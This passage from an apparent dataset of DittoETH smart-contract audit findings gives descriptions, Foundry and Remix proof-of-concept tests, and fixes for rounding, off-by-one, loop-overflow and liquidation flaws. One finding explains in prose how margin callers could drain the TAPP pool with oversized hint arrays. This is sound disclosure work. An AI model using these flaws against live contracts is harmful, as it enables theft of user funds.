oracleD\\n uint256 private primaryLiquidationCR = 1700000000000000000; // 1.7 ether (as on forked mainnet)\\n\\n function _getSavedOrSpotOraclePrice() internal view returns (uint256) {\\n uint256 priceInEth = price.div(basePrice);\\n return priceInEth; // will return 501808648347845 =~ 0.0005 ether // (as on forked mainnet)\\n }\\n\\n function getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n uint256 oraclePrice\\n ) internal view returns (uint256) {\\n return short_collateral.div(short_ercDebt.mul(oraclePrice));\\n }\\n\\n function getCollateralRatioSpotPrice_CorrectStyle(uint256 oracleN, uint256 oracleD)\\n internal\\n view\\n returns (uint256)\\n {\\n return (short_collateral.mul(oracleD)).div(short_ercDebt.mul(oracleN));\\n }\\n\\n /* solhint-disable no-console */\\n function 
test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n ) public view {\\n uint256 cRatio =\\n getCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol(\\n _getSavedOrSpotOraclePrice()\\n );\\n console.log(\"cRatio calculated (existing style) =\", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(\"Errors.SufficientCollateral; can not be flagged\");\\n } else {\\n console.log(\"InsufficientCollateral; can be flagged\");\\n }\\n }\\n\\n /* solhint-disable no-console */\\n function test_GetCollateralRatioSpotPrice_CorrectStyle() public view {\\n uint256 cRatio = getCollateralRatioSpotPrice_CorrectStyle(price, basePrice);\\n console.log(\"cRatio calculated (correct style) =\", cRatio);\\n if (cRatio >= primaryLiquidationCR) {\\n console.log(\"Errors.SufficientCollateral; can not be flagged\");\\n } else {\\n console.log(\"InsufficientCollateral; can be flagged\");\\n }\\n }\\n}\\n```\\n\\n\\nFirst, let's see the output as per protocol's calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_IncorrectStyle_As_In_Existing_DittoProtocol -vv:\\n```\\nLogs:\\n cRatio calculated (existing style) = 1700000000000000996\\n Errors.SufficientCollateral; can not be flagged\\n```\\n\\nSo the short can not be flagged as `cRatio > primaryLiquidationCR` of 1700000000000000000.\\nNow, let's see the output as per the correct calculation. Run forge test --mt test_GetCollateralRatioSpotPrice_CorrectStyle -vv:\\n```\\nLogs:\\n cRatio calculated (correct style) = 1699999999999899995\\n InsufficientCollateral; can be flagged\\n```\\n\\nShort's cRatio is actually below primaryLiquidationCR. Should have been flagged ideally.\\nчThese steps need to be taken to fix the issue. Developer may have to make some additional changes since `.mul`, `.div`, etc are being used from the `PRBMathHelper.sol` library. 
Following is the general workflow required:\\nCreate additional functions to fetch oracle parameters instead of price: Create copies of `getOraclePrice()` and `getSavedOrSpotOraclePrice()`, but these ones return `oracleN` & `oracleD` instead of the calculated price. Let's assume the new names to be `getOraclePriceParams()` and `getSavedOrSpotOraclePriceParams()`.\\nCreate a new function to calculate cRatio which will be used in place of the above occurences of getCollateralRatioSpotPrice():\\n```\\n function getCollateralRatioSpotPriceFromOracleParams(\\n STypes.ShortRecord memory short,\\n uint256 oracleN,\\n uint256 oracleD\\n ) internal pure returns (uint256 cRatio) {\\n return (short.collateral.mul(oracleD)).div(short.ercDebt.mul(oracleN));\\n }\\n```\\n\\n\\nFor fixing the last issue of `oraclePrice.mul(1.01 ether)` on L847, first call `getOraclePriceParams()` to get `oracleN` & `oracleD` and then:\\n```\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n// Remove the line below\\n 847 <= oraclePrice.mul(1.01 ether)\\n// Add the line below\\n 847 <= (oracleN.mul(1.01 ether)).div(oracleD)\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n```\\nч```\\n File: contracts/facets/YieldFacet.sol\\n\\n 76 function _distributeYield(address asset)\\n 77 private\\n 78 onlyValidAsset(asset)\\n 79 returns (uint88 yield, uint256 dittoYieldShares)\\n 80 {\\n 81 uint256 vault = s.asset[asset].vault;\\n 82 // Last updated zethYieldRate for this vault\\n 83 uint80 zethYieldRate = s.vault[vault].zethYieldRate;\\n 84 // Protocol time\\n 85 uint256 timestamp = LibOrders.getOffsetTimeHours();\\n 86 // Last saved oracle price\\n 87 uint256 oraclePrice = LibOracle.getPrice(asset);\\n 88 // CR of shortRecord collateralized at initialMargin for this asset\\n 89 uint256 initialCR = LibAsset.initialMargin(asset) + 1 ether;\\n 90 // Retrieve first non-HEAD short\\n 91 uint8 id = 
s.shortRecords[asset][msg.sender][Constants.HEAD].nextId;\\n 92 // Loop through all shorter's shorts of this asset\\n 93 while (true) {\\n 94 // One short of one shorter in this market\\n 95 STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n 96 // To prevent flash loans or loans where they want to deposit to claim yield immediately\\n 97 bool isNotRecentlyModified =\\n 98 timestamp - short.updatedAt > Constants.YIELD_DELAY_HOURS;\\n 99 // Check for cancelled short\\n 100 if (short.status != SR.Cancelled && isNotRecentlyModified) {\\n 101 uint88 shortYield =\\n 102 short.collateral.mulU88(zethYieldRate - short.zethYieldRate);\\n 103 // Yield earned by this short\\n 104 yield += shortYield;\\n 105 // Update zethYieldRate for this short\\n 106 short.zethYieldRate = zethYieldRate;\\n 107 // Calculate CR to modify ditto rewards\\n 108 uint256 cRatio = short.getCollateralRatioSpotPrice(oraclePrice);\\n 109 if (cRatio <= initialCR) {\\n 110 dittoYieldShares += shortYield;\\n 111 } else {\\n 112 // Reduce amount of yield credited for ditto rewards proportional to CR\\n 113 dittoYieldShares += shortYield.mul(initialCR).div(cRatio);\\n 114 }\\n 115 }\\n 116 // Move to next short unless this is the last one\\n 117 if (short.nextId > Constants.HEAD) {\\n 118 id = short.nextId;\\n 119 } else {\\n 120 break;\\n 121 }\\n 122 }\\n 123 }\\n```\\n\\nThis rounding-up can lead to user's `cRatio` to be considered as `>initialCR` even when it's slightly lower. 
This results in greater `dittoYieldShares` being calculated.\\n```\\n File: contracts/facets/MarginCallPrimaryFacet.sol\\n\\n 43 function flagShort(address asset, address shorter, uint8 id, uint16 flaggerHint)\\n 44 external\\n 45 isNotFrozen(asset)\\n 46 nonReentrant\\n 47 onlyValidShortRecord(asset, shorter, id)\\n 48 {\\n 49 if (msg.sender == shorter) revert Errors.CannotFlagSelf();\\n 50 STypes.ShortRecord storage short = s.shortRecords[asset][shorter][id];\\n 51 short.updateErcDebt(asset);\\n 52\\n 53 if (\\n 54 short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset))\\n 55 >= LibAsset.primaryLiquidationCR(asset) // @audit-issue : this will evaluate to `true` due to rounding-up and the short will not be eligible for flagging\\n 56 ) {\\n 57 revert Errors.SufficientCollateral();\\n 58 }\\n 59\\n 60 uint256 adjustedTimestamp = LibOrders.getOffsetTimeHours();\\n 61\\n 62 // check if already flagged\\n 63 if (short.flaggerId != 0) {\\n 64 uint256 timeDiff = adjustedTimestamp - short.updatedAt;\\n 65 uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(asset);\\n 66\\n 67 if (timeDiff <= resetLiquidationTime) {\\n 68 revert Errors.MarginCallAlreadyFlagged();\\n 69 }\\n 70 }\\n 71\\n 72 short.setFlagger(cusd, flaggerHint);\\n 73 emit Events.FlagShort(asset, shorter, id, msg.sender, adjustedTimestamp);\\n 74 }\\n```\\n\\n\\n```\\n File: contracts/facets/MarginCallSecondaryFacet.sol\\n\\n 38 function liquidateSecondary(\\n 39 address asset,\\n 40 MTypes.BatchMC[] memory batches,\\n 41 uint88 liquidateAmount,\\n 42 bool isWallet\\n 43 ) external onlyValidAsset(asset) isNotFrozen(asset) nonReentrant {\\n 44 STypes.AssetUser storage AssetUser = s.assetUser[asset][msg.sender];\\n 45 MTypes.MarginCallSecondary memory m;\\n 46 uint256 minimumCR = LibAsset.minimumCR(asset);\\n 47 uint256 oraclePrice = LibOracle.getSavedOrSpotOraclePrice(asset);\\n 48 uint256 secondaryLiquidationCR = LibAsset.secondaryLiquidationCR(asset);\\n 49\\n 50 uint88 
liquidatorCollateral;\\n 51 uint88 liquidateAmountLeft = liquidateAmount;\\n 52 for (uint256 i; i < batches.length;) {\\n 53 m = _setMarginCallStruct(\\n 54 asset, batches[i].shorter, batches[i].shortId, minimumCR, oraclePrice\\n 55 );\\n 56\\n\\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n\\n 129 function _setMarginCallStruct(\\n 130 address asset,\\n 131 address shorter,\\n 132 uint8 id,\\n 133 uint256 minimumCR,\\n 134 uint256 oraclePrice\\n 135 ) private returns (MTypes.MarginCallSecondary memory) {\\n 136 LibShortRecord.updateErcDebt(asset, shorter, id);\\n 137\\n 138 MTypes.MarginCallSecondary memory m;\\n 139 m.asset = asset;\\n 140 m.short = s.shortRecords[asset][shorter][id];\\n 141 m.vault = s.asset[asset].vault;\\n 142 m.shorter = shorter;\\n 143 m.minimumCR = minimumCR;\\n 144 m.cRatio = m.short.getCollateralRatioSpotPrice(oraclePrice);\\n 145 return m;\\n 146 }\\n```\\n\\n\\n```\\n File: contracts/facets/ShortRecordFacet.sol\\n\\n 117 function combineShorts(address asset, uint8[] memory ids)\\n 118 external\\n 119 isNotFrozen(asset)\\n 120 nonReentrant\\n 121 onlyValidShortRecord(asset, msg.sender, ids[0])\\n 122 {\\n 123 if (ids.length < 2) revert Errors.InsufficientNumberOfShorts();\\n 124 // First short in the array\\n 125 STypes.ShortRecord storage firstShort = s.shortRecords[asset][msg.sender][ids[0]];\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 174\\n 175 // Merge all short records into the short at position id[0]\\n 176 firstShort.merge(ercDebt, ercDebtSocialized, collateral, yield, c.shortUpdatedAt);\\n 177\\n 178 // If at least one short was flagged, ensure resulting c-ratio > primaryLiquidationCR\\n 179 if (c.shortFlagExists) {\\n 180 if (\\n 181 firstShort.getCollateralRatioSpotPrice(\\n 182 LibOracle.getSavedOrSpotOraclePrice(_asset)\\n 183 ) < LibAsset.primaryLiquidationCR(_asset)\\n 184 ) revert 
Errors.InsufficientCollateral();\\n 185 // Resulting combined short has sufficient c-ratio to remove flag\\n 186 firstShort.resetFlag();\\n 187 }\\n 188 emit Events.CombineShorts(asset, msg.sender, ids);\\n 189 }\\n```\\n\\n\\nNOTE:\\nWhile the operation done in this piece of code is a bit different from the above analysis, I am clubbing it with this bug report as the underlying issue is the same (and the resolution would be similar): Multiplication and division operations should not be done directly on top of fetched oracle price, without paying attention to new order of evaluation:\\n```\\n File: contracts/libraries/LibOrders.sol\\n\\n 812 function _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n 813 private\\n 814 {\\n 815 AppStorage storage s = appStorage();\\n 815 uint256 oraclePrice = LibOracle.getOraclePrice(asset);\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 845 //@dev: force hint to be within 1% of oracleprice\\n 846 bool startingShortWithinOracleRange = shortPrice\\n 847 <= oraclePrice.mul(1.01 ether) // @audit-issue : division before multiplication\\n 848 && s.shorts[asset][prevId].price >= oraclePrice;\\n \\n // rest of code// rest of code\\n // rest of code// rest of code\\n // rest of code// rest of code\\n\\n 866 }\\n```\\n\\n\\nThe effective calculation being done above is:\\n```\\n (oracleN / oracleD) * (1.01 ether) // division before multiplication\\n```\\n\\n\\nWhich should have been:\\n```\\n (oracleN * 1.01 ether) / oracleD\\n```\\n\\n\\nSimilar multiplication or division operations have been done on `price` at various places throughout the code, which can be clubbed under this root cause itself.ч```\\nuint256 cRatio = short.getCollateralRatioSpotPrice(LibOracle.getSavedOrSpotOraclePrice(asset));\\n```\\n -Primary short liquidation can not be completed in the last hour of the liquidation timelineчmediumчShorts flagged for liquidation can not be 
liquidated in the last and final hour of the liquidation timeline, resulting in the liquidation flag being reset and requiring the short to be flagged again.\\nIf a short's collateral ratio is below the primary liquidation threshold (determined by the `LibAsset.primaryLiquidationCR` function, by default set to 400%), anyone can flag the position for liquidation by calling the `MarginCallPrimaryFacet.flagShort` function.\\nSubsequently, the short position owner has a certain amount of time, specifically, `10 hours` (configured and determined by the `LibAsset.firstLiquidationTime` function), to repay the loan and bring the collateral ratio back above the primary liquidation threshold. If the short position owner fails to do so, the short position can be liquidated by calling the `MarginCallPrimaryFacet.liquidate` function.\\nThe specific criteria for the liquidation eligibility are defined and determined in the `MarginCallPrimaryFacet._canLiquidate` function.\\ncontracts/facets/MarginCallPrimaryFacet.sol#L387\\n```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n\\nThis function 
checks in lines 387-389 if the elapsed time (timeDiff) since the short was updated is equal or greater than the reset liquidation time (resetLiquidationTime), which is by default set to `16 hours`. In this case, the short position has not been liquidated in time and has to be flagged again.\\nHowever, this condition conflicts with the `isBetweenSecondAndResetLiquidationTime` criteria in lines 394-395, specifically, the `timeDiff` <= `resetLiquidationTime` check. If the `timeDiff` value is equal to `resetLiquidationTime`, both conditions, in line 387 as well as the check in line 395, are `true`. Due to line 387 taking precedence, the liquidation is considered outdated and the short position has to be flagged again.\\nBased on the check in lines 67-69 of the `flagShort` function, it is evident that a short position flagged for liquidation requires re-flagging only if the `timeDiff` value is greater (>) than the reset liquidation time (resetLiquidationTime):\\ncontracts/facets/MarginCallPrimaryFacet.sol#L67-L69\\n```\\nif (timeDiff <= resetLiquidationTime) {\\n revert Errors.MarginCallAlreadyFlagged();\\n}\\n```\\n\\nThus, the check in line 387 is incorrect, leading to prematurely resetting the short's liquidation flagging status.\\nAs the timestamps are in `hours`, and the liquidation timeline is relatively short, having an off-by-one error in the liquidation timeline can lead to a significant impact on the liquidations. 
Concretely, attempting to liquidate a short position in the last hour of the timeline, i.e., `timeDiff = 16`, is not possible.чConsider using `>` instead of `>=` in line 387 to prevent the liquidation timeline from overlapping with the bounds check in line 395.чч```\\nfunction _canLiquidate(MTypes.MarginCallPrimary memory m)\\n private\\n view\\n returns (bool)\\n{\\n// rest of code // [// rest of code]\\n uint256 timeDiff = LibOrders.getOffsetTimeHours() - m.short.updatedAt;\\n uint256 resetLiquidationTime = LibAsset.resetLiquidationTime(m.asset);\\n❌ if (timeDiff >= resetLiquidationTime) {\\n return false;\\n } else {\\n uint256 secondLiquidationTime = LibAsset.secondLiquidationTime(m.asset);\\n bool isBetweenFirstAndSecondLiquidationTime = timeDiff\\n > LibAsset.firstLiquidationTime(m.asset) && timeDiff <= secondLiquidationTime\\n && s.flagMapping[m.short.flaggerId] == msg.sender;\\n bool isBetweenSecondAndResetLiquidationTime =\\n timeDiff > secondLiquidationTime && timeDiff <= resetLiquidationTime;\\n if (\\n !(\\n (isBetweenFirstAndSecondLiquidationTime)\\n || (isBetweenSecondAndResetLiquidationTime)\\n )\\n ) {\\n revert Errors.MarginCallIneligibleWindow();\\n }\\n return true;\\n }\\n}\\n```\\n -Changes in `dittoShorterRate` affect retroactively to accrued Ditto yield sharesчlowчThe calculation of the Ditto rewards earned by shorters does not take into account that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users.\\n`YieldFacet.sol:distributeYield()` calculates and credits ZETH and Ditto rewards earned from short records by `msg.sender`. 
The distribution of the rewards is performed in the `_claimYield()` function:\\n```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n\\nFocusing on the Ditto rewards, we can see that the function receives the number of yield shares earned by the user (dittoYieldShares) and in line 138 calculates the Ditto reward by multiplying this amount by the total amount of rewards of the protocol (dittoRewardShortersTotal) and dividing it by the total amount of yield shares of the protocol (dittoYieldSharesTotal).\\nIf we take a look in line 135 at how the `dittoRewardShortersTotal` is calculated, we can see that it is the product of the Ditto shorter rate and total time elapsed since the protocol deployment.\\nThis last calculation is wrong, as it is assumed that the Ditto shorter rate is constant, but this parameter can be changed by the admin or the DAO. 
This means that the changes in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Also, users that have yielded the same number of shares during the same period, will receive different rewards depending on whether they claim their rewards before or after the Ditto shorter rate change.\\nAdd the following code snippet into `test/Yield.t.sol` and run `forge test --mt testYieldRateChange`.\\n```\\n function testYieldRateChange() public {\\n address alice = makeAddr(\"alice\");\\n address bob = makeAddr(\"bob\");\\n address[] memory assets = new address[](1);\\n assets[0] = asset;\\n\\n fundLimitBid(DEFAULT_PRICE, 320000 ether, receiver);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, alice);\\n fundLimitShort(DEFAULT_PRICE, 80000 ether, bob);\\n generateYield();\\n skip(yieldEligibleTime);\\n\\n // Alice and Bob have the same number of Ditto yield shares\\n assertEq(diamond.getDittoMatchedReward(vault, alice), diamond.getDittoMatchedReward(vault, alice));\\n\\n // Alice's yield is distributed\\n vm.prank(alice);\\n diamond.distributeYield(assets);\\n\\n // Ditto shorter rate is updated\\n vm.prank(owner);\\n diamond.setDittoShorterRate(vault, 2);\\n\\n // Bob's yield is distributed\\n vm.prank(bob);\\n diamond.distributeYield(assets);\\n\\n uint256 aliceDittoRewards = diamond.getDittoReward(vault, alice);\\n uint256 bobDittoRewards = diamond.getDittoReward(vault, bob);\\n\\n // Bob receives more Ditto rewards than Alice, even both were entitled to the same amount\\n assertApproxEqAbs(aliceDittoRewards * 2, bobDittoRewards, 2);\\n }\\n```\\nчCreate two new state variables that keep track of the timestamp of the last Ditto shorter rate update and the total Ditto rewards accrued at that time. 
Then the calculation of `dittoRewardShortersTotal` would be:\\n```\\n uint256 dittoRewardShortersTotal = lastSnapshotRewards + Vault.dittoShorterRate * (protocolTime - lastSnapshotTimestamp);\\n```\\nчChanges in the Ditto shorter rate will impact retroactively, inflating or deflating the new Ditto rewards of the users. Users might not be incentivized to claim their rewards, as they might receive more rewards if they wait for the Ditto shorter rate to change.ч```\\n125 // Credit ZETH and Ditto rewards earned from shortRecords from all markets\\n126 function _claimYield(uint256 vault, uint88 yield, uint256 dittoYieldShares) private {\\n127 STypes.Vault storage Vault = s.vault[vault];\\n128 STypes.VaultUser storage VaultUser = s.vaultUser[vault][msg.sender];\\n129 // Implicitly checks for a valid vault\\n130 if (yield <= 1) revert Errors.NoYield();\\n131 // Credit yield to ethEscrowed\\n132 VaultUser.ethEscrowed += yield;\\n133 // Ditto rewards earned for all shorters since inception\\n134 uint256 protocolTime = LibOrders.getOffsetTime();\\n135 uint256 dittoRewardShortersTotal = Vault.dittoShorterRate * protocolTime;\\n136 // Ditto reward proportion from this yield distribution\\n137 uint256 dittoYieldSharesTotal = Vault.zethCollateralReward;\\n138 uint256 dittoReward =\\n139 dittoYieldShares.mul(dittoRewardShortersTotal).div(dittoYieldSharesTotal);\\n140 // Credit ditto reward to user\\n141 if (dittoReward > type(uint80).max) revert Errors.InvalidAmount();\\n142 VaultUser.dittoReward += uint80(dittoReward);\\n143 }\\n```\\n -Margin callers can drain the TAPP during liquidation by willingly increase gas costs with the shortHintArrayчhighчDuring primary liquidation the TAPP (Treasury Asset Protection Pool) pays the gas costs of force bids, so that margin callers are even motivated to liquidate shorters, if gas costs are high. To liquidate a shortRecord margin, callers must provide a parameter called shortHintArray to the function call. 
The purpose of this array is to save gas, it should contain id hints where the protocol should look for shorts in the order book which are currently above the oracle price, since users can't match against shorts under the oracle price. As the protocol loops through this shortHintArray, an array with wrong hints could increase gas and as the length of the array is never checked, it could even increase the gas costs to an amount that would fully drain the TAPP. As the TAPP is an important security mechanism of the protocol, draining the funds of it could lead to a shutdown of the market and therefore to a big loss of user funds.\\nThe liquidate function takes the shortHintArray as parameter:\\n```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n\\nThis array is then used to create a forceBid:\\n```\\n(m.ethFilled, ercAmountLeft) = IDiamond(payable(address(this))).createForcedBid(\\n address(this), m.asset, _bidPrice, m.short.ercDebt, shortHintArray\\n);\\n```\\n\\nAnd during these process, the protocol loops over this array:\\n```\\nfunction _updateOracleAndStartingShort(address asset, uint16[] memory shortHintArray)\\n private\\n{\\n // rest of code\\n uint16 shortHintId;\\n for (uint256 i = 0; i < shortHintArray.length;) {\\n shortHintId = shortHintArray[i];\\n unchecked {\\n ++i;\\n }\\n\\n {\\n O shortOrderType = s.shorts[asset][shortHintId].orderType;\\n if (\\n shortOrderType == O.Cancelled || shortOrderType == O.Matched\\n || shortOrderType == O.Uninitialized\\n ) {\\n continue;\\n }\\n }\\n // rest of code\\n}\\n```\\n\\nIn the end, the TAPP pays for the gas costs in the _marginFeeHandler function:\\n```\\nfunction _marginFeeHandler(MTypes.MarginCallPrimary memory m) private {\\n STypes.VaultUser storage VaultUser = 
s.vaultUser[m.vault][msg.sender];\\n STypes.VaultUser storage TAPP = s.vaultUser[m.vault][address(this)];\\n // distribute fees to TAPP and caller\\n uint88 tappFee = m.ethFilled.mulU88(m.tappFeePct);\\n uint88 callerFee = m.ethFilled.mulU88(m.callerFeePct) + m.gasFee;\\n\\n m.totalFee += tappFee + callerFee;\\n //@dev TAPP already received the gasFee for being the forcedBid caller. tappFee nets out.\\n if (TAPP.ethEscrowed >= callerFee) {\\n TAPP.ethEscrowed -= callerFee;\\n VaultUser.ethEscrowed += callerFee;\\n } else {\\n // Give caller (portion of?) tappFee instead of gasFee\\n VaultUser.ethEscrowed += callerFee - m.gasFee + tappFee;\\n m.totalFee -= m.gasFee;\\n TAPP.ethEscrowed -= m.totalFee;\\n }\\n}\\n```\\n\\nTherefore, if the user provides a big shortHintArray with wrong hints the gas costs will drastically increase to a point which drains the funds of the TAPP.чCheck the length of the shortHintArray.чAs the TAPP no longer has enough funds to pay for liquidation, if shortRecords are under collateralized. A lot of problems like the increment of the ercDebtRate and the shutdown of the market can occur. This leads to a big loss of user funds.ч```\\nfunction liquidate(\\n address asset,\\n address shorter,\\n uint8 id,\\n uint16[] memory shortHintArray\\n)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, shorter, id)\\n returns (uint88, uint88)\\n{\\n// rest of code\\n}\\n```\\n -The protocol allows less flags to be generated than possible which could lead to a DoS of the primary liquidation processчlowчThe maximum flags (for liquidation) that can exist at the same time should be limited by the maximum number of flaggerIdCounter, which is a uint24, but it is limited by the maximum number of a uint16 instead. Therefore, a maximum of 65535 shortRecords can be flagged for liquidation at the same time. 
This is far too few if the protocol is used a lot and a market goes up in price, and would therefore lead to a DoS of the liquidation process.\\nThe maximum of the flaggerIdCounter and therefore the maximum of flags that can exist at the same time is limited by the maximum number of a uint24:\\n```\\nuint24 flaggerIdCounter;\\n```\\n\\nIf there are no flags left to override, the system tries to generate a new flagId, but it does not use the maximum number of uint24, it uses the maximum number of uint16 instead, which is 65535:\\n```\\n} else if (s.flaggerIdCounter < type(uint16).max) {\\n //@dev generate brand new flaggerId\\n short.flaggerId = flagStorage.g_flaggerId = s.flaggerIdCounter;\\n s.flaggerIdCounter++;\\n} else {\\n revert Errors.InvalidFlaggerHint();\\n}\\n```\\n\\nThis could be far too few if the protocol is used a lot and the price of a market goes up. Therefore it would prevent creating new flaggerIds, and shortRecords with unhealthy CR cannot be liquidated.чSet the check to type(uint24).max.чDoS of the liquidation process, which could potentially lead to a lot of shortRecords with unhealthy CR, which could in the worst case lead to the situation that assets are no longer backed enough, and the market needs to be shut down. This would result in a big loss of user funds.ч```\\nuint24 flaggerIdCounter;\\n```\\n -Infinite loop breaks protocol functionality.чlowчProtocol documentation says that DAO is able to cancel up to 1,000 orders when order count is above 65,000. However, because of the faulty `for loop` it is impossible to cancel more than 255 orders.\\nVulnerability details\\n`orderId` is implemented in protocol to index orders in orderbook. In the protocol documentation it is written that it can handle above 65,000 orders because of reusable orderIds. When there are more than 65,500 orders DAO can cancel up to 1,000 orders. Here are the code blocks from `cancelOrderFarFromOracle` function which allows DAO to cancel orders. 
It also allows user to cancel one order.\\nIt makes sure that there are more than 65,000 orders.\\n```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n\\nThis ensures that DAO can't cancel more than 1,000 orders.\\n```\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n```\\n\\nLater `cancelOrderFarFromOracle` checks if `msg.sender == LibDiamond.diamondStorage().contractOwner` and based on the boolean value (true or false) of this statement it allows to cancel the desired amount of orders.\\nThe problem occurs in `cancelManyOrders` (LibOrders.sol) which is called on the mapping of orders of specified earlier `orderType`.\\n```\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n \\n```\\n\\nThis function receives parameters:\\nmapping of orders to cancel\\naddress of asset (market that will be impacted)\\nlast order id\\nnumber of orders to cancel\\nWhen we look at the implementation of this function we can see that `uint8` was used as a variable for the iteration in the `for loop`. `uint8` i maximum value is `255`. 
As we can see in the `for loop` there is an `unchecked` statement which allows uint underflow / overflow.\\n```\\n unchecked {\\n ++i;\\n} \\n```\\n\\nSo when we try to add 1 to 255 (255 + 1) solidity would automatically `revert` due to uint overflow but when we use `unchecked` solidity allows us to do this operation and the result of this will be `0`.\\nWhen DAO would like to cancel more than 255 orders it would result in an infinite loop since:\\nthe for loop will iterate when `i` < numOrdersToCancel\\nthe value of `i` will always be less than 256 because it can't get bigger than that due to overflow\\n`i = 255` and `i < 256` `unchecked {++i;}` Next iteration `i = 0` and `i < 256` `unchecked {++i;}`\\nI created a pretty simple PoC in Remix.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity 0.8.21;\\n\\n\\ncontract PoC {\\n\\n uint256 public iterationsCount;\\n\\n function infiniteForLoop(uint256 amountOfIterations) public {\\n for(uint8 i; i < amountOfIterations;) {\\n iterationsCount += 1;\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n\\n}\\n```\\n\\nTo see that this function can't handle more than 255 orders cancellations run this function with input parameter (amountOfIterations) equal to 256 or above.\\nFurther explanation\\nAfter DAO tries to cancel more than 255 orders the infinite loop will be created which will terminate the transaction.\\nThe transaction will fail because of gas consumption. For loop will run as many times as it can with provided gas. Since it will try to run infinitely it will run out of gas.чTo solve this problem change `uint8 i` to `uint16` or any higher uint that can handle the desired amount of iterations.чProtocol documentation states that DAO is able to cancel 1,000 orders. Since it is not possible with the current implementation of the code this issue disrupts the protocol's functionality. 
The implemented code can't handle desired functionality.\\nTools used\\nVScode, Manual Review, Remixч```\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n```\\n -Order creation can run out of gas since relying on previous order matchtypeчmediumчIf the hint order id has been reused and the previous order type is `matched` the current code iterates from the head of the linked list under the assumption that `since the previous order has been `matched` it must have been at the top of the orderbook which would mean the new order with a similar price would also be somewhere near the top of the orderbook`.\\n```\\n function findOrderHintId(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n MTypes.OrderHint[] memory orderHintArray\\n ) internal returns (uint16 hintId) {\\n\\n // more code\\n\\n // @audit if a reused order's prevOrderType is matched, returns HEAD\\n\\n if (hintOrderType == O.Cancelled || hintOrderType == O.Matched) {\\n emit Events.FindOrderHintId(0);\\n continue;\\n } else if (\\n orders[asset][orderHint.hintId].creationTime == orderHint.creationTime\\n ) {\\n emit Events.FindOrderHintId(1);\\n return orderHint.hintId;\\n } else if (orders[asset][orderHint.hintId].prevOrderType == O.Matched) {\\n //@dev If hint was prev matched, it means that the hint was close to HEAD and therefore is reasonable to use 